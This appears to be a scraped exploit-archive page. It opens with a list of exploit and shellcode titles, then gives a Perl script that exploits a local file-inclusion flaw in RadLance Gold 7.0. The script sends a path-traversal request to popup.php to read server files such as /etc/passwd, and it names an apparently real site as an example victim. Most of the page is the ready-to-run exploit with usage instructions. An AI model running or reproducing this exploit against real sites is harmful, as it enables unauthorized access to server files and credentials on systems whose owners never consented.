880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
72 lines
No EOL
2.1 KiB
Perl
Executable file
72 lines
No EOL
2.1 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/17975/info
|
|
|
|
RadLance is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts.
|
|
|
|
RadLance Gold 7.0 is reported affected by this issue; other versions may also be vulnerable.
|
|
|
|
#!/usr/bin/perl
|
|
#Discovered and coded by Mr.CrackerZ ( Security Team )
|
|
#Contact me ( bo_ali90@hotmail.com )
|
|
#Usage: radlance.pl <victim> <local file to read>
|
|
#Google: Powered by: RadLance Gold v7
|
|
#Tested Under RadLance Gold v7 ( Local Inclusion Exploit )
|
|
#Example:
|
|
http://www.getabuilder.co.uk/popup.php?read=../../../../../../../../../etc/passwd
|
|
#Perl example: radlance.pl www.getabuilder.co.uk
|
|
../../../../../../../../../etc/passwd
|
|
#################################################
|
|
|
|
|
|
|
|
|
|
|
|
use IO::Socket;
|
|
if(@ARGV < 2){
|
|
print "
|
|
+*************************************************************************+
|
|
|
|
Exploit Discovered and coded by Mr.CrackerZ ( Security Team )
|
|
|
|
radlance.pl <victim> <local file to read>
|
|
|
|
<victim> = www.example.com
|
|
|
|
<local file to read> = ../../../../../../../../../etc/passwd
|
|
|
|
|
|
+*************************************************************************+
|
|
";
|
|
exit();
|
|
}
|
|
#Local variables
|
|
$wbbserver = $ARGV[0];
|
|
$wbbserver =~ s/(http:\/\/)//eg;
|
|
$wbbhost = "http://".$wbbserver;
|
|
$port = "80";
|
|
$wbbtar = "/popup.php?read=";
|
|
$wbbxp = $ARGV[1];
|
|
$wbbreq = $wbbhost.$wbbtar.$wbbxp;
|
|
#Writing data to socket
|
|
print "\r\n";
|
|
print "+ Trying to connect: $wbbserver\n";
|
|
$wbb = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$wbbserver",
|
|
PeerPort => "$port") || die "\n+ Connection failed...\n";
|
|
print $wbb "GET $wbbreq\n";
|
|
print $wbb "Host: $wbbserver\n";
|
|
print $wbb "Accept: */*\n";
|
|
print $wbb "Connection: close\n\n";
|
|
print "+ Connected!...\n";
|
|
print "\r\n";
|
|
print
|
|
"+**********************************************************************+\n";
|
|
while($answer = <$wbb>) {
|
|
|
|
print <$wbb>;
|
|
printf "\r\n";
|
|
|
|
}
|
|
|
|
print
|
|
"+**********************************************************************+\n\ncopy
|
|
the code and save it as .html or .php depend the file u are trying
|
|
to\naccess to , and if u saw the file cont so you got what u need :)\n"; |